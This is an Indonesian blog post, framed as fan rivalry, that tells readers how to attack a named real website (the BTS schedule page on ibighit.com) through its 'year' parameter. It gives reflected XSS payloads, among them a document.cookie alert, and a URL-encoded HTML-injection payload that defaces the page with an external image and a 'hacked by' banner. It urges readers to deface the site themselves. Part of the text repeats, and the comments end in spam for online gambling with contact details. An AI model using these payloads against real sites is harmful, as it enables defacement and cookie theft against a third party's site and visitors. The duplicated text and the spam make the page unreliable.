Reflected XSS pada website BTS Kpop
Reemar Garis Keras!.
Belakangan ini ramai pembahasan mengenai Remar Vs BTS yang dimana para betina +62 meributkan nya,
Dan salah satu Reemar Garis Keras pun bertindak mencoba menyerang melewati situs BTS yaitu https://ibighit.com/bts/
Dan hal hasil salah satu Reemar Garis Keras pun berhasil menyerang ke situs BTS yang dimana situs itu memiliki Bug yang akan kita bahas kali ini.
langsung aja sesuai judul Reflected XSS pada website BTS Kpop :v
Saya mendapatkan informasi mengenai penemuan Bug pada website BTS dari teman saya yang di kubu Reemar Garis Keras
Bug yang dia dapatkan adalah, Bug HTML Injection & XSS, Url Poisoning, pada Colum schedule di Pencarian Tahun,
Link dibawah ini.
Oke langsung aja tanpa banyak bacot skuyy ahh
Kyta masukan payload nya aja gaes
Payload XSS print Nick
'"><script></script>'"><img src=x onerror=prompt(1);>
Setelah memasukkan Payload jika masih vuln akan muncu pop up seperti ini
Oke Kyta lanjut ke Html Injection ya guys sama seperti tadi
https://ibighit.com/bts/eng/schedule/?year=
Lalu kita masukkan pay load dibawah ini
%3Ccenter%3E%3Ctable%20height=%22400%22%20width=%22400%22%3E%20%3Ctd%20align=%22center%22%3E%20%3Cimg%20class=%22getar%22%20height=%22250%22%20src=%22https://l.top4top.io/p_1579fgyf30.jpeg%22/%3E%20%3Cb%3E%3Ci%3E%3Cbr%3E%3Cfont%20size=%225%22%20color=red%3ESuntik%20HTML%20%20by%20./CR0T_D1LU4R%20A.K.A%20Reemar%20GARIS%20KERAS!.%3C/font%3E%3C/br%3E
Jika masih vuln akan muncul gambar seperti ini :
Oke yang selanjutnya ialah XSS get cookie
https://ibighit.com/bts/eng/schedule/?year=
Setelah itu kalian masukkan payload ini
<img src=asdf onerror=alert(document.cookie)>
Yang nanti akan muncul seperti dibawah ini
Setelah memasukkan Payload jika masih vuln akan muncu pop up seperti ini
Oke Kyta lanjut ke Html Injection ya guys sama seperti tadi
https://ibighit.com/bts/eng/schedule/?year=
Lalu kita masukkan pay load dibawah ini
%3Ccenter%3E%3Ctable%20height=%22400%22%20width=%22400%22%3E%20%3Ctd%20align=%22center%22%3E%20%3Cimg%20class=%22getar%22%20height=%22250%22%20src=%22https://l.top4top.io/p_1579fgyf30.jpeg%22/%3E%20%3Cb%3E%3Ci%3E%3Cbr%3E%3Cfont%20size=%225%22%20color=red%3ESuntik%20HTML%20%20by%20./CR0T_D1LU4R%20A.K.A%20Reemar%20GARIS%20KERAS!.%3C/font%3E%3C/br%3E
Jika masih vuln akan muncul gambar seperti ini :
Oke yang selanjutnya ialah XSS get cookie
https://ibighit.com/bts/eng/schedule/?year=
Setelah itu kalian masukkan payload ini
<img src=asdf onerror=alert(document.cookie)>
Yang nanti akan muncul seperti dibawah ini
Kyta lanjut yang terakhir yaitu ialah Url Poisoning
Masih tetap dan kalian kasih aja heked by kalian:v
Example nya
Clingggg taraaaaa!!!!
Oke mungkin sekian dari gw thanks
Buat Dengan Video Dong Min Biar Lebih Jelas Lagi 😀
ReplyDeleteBelum faham Gw
ReplyDeleteKasih url live buat demo
ReplyDeleteSusah gmna Yah
ReplyDeletePakde video bro biar enak
ReplyDeleteSaran aja si
Linkaja88 Agen Judi Online Deposit Linkaja Terpercaya Di Indonesia !
ReplyDeleteBonus Spesial 100% Untuk Taruhan Sabung Ayam Online & Live Casino !
S128 | SV388 | BACCARAT | ROULETTE | REDTIGER | SICBO DADU | BLACKJACK | NIUNIU
Tersedia Juga Permainan Lengkap Lainnya :
• Tembak Ikan Online
• Sportsbook / Taruhan Bola
• Slot Online
• Bingo
• Bola Tangkas
• Poker Online
• Domino QQ
• Ceme
• Capsa Susun
• Adu Q
Pendaftaran Hubungi Kontak Resmi Kami Dibawah ini (Online 24 Jam Setiap Hari) :
» Nomor WhatsApp : 0812–2222–995
» ID Telegram : @bolavitacc
» ID Wechat : Bolavita
» ID Line : cs_bolavita